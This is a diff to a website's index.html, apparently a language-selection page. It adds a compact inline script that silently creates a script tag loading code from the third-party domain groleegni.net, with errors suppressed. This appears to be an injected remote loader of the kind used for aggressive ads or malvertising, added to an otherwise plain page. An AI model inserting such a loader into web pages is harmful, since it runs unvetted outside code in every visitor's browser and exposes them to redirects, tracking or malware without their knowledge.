--- a/index.html
+++ b/index.html
@@ -148,7 +148,7 @@
             <h3>Hindi</h3>
             <p>हिंदी</p>
         </div>
-        
+        <script>(function(d,z,s){s.src='https://'+d+'/401/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('groleegni.net',8896632,document.createElement('script'))</script>
    <a href="privacy.html" class="button">Privacy Policy</a>
   <a href="About.html" class="button">About Us</a>
  <a href="Terms.html" class="button">terms and conditions</a>
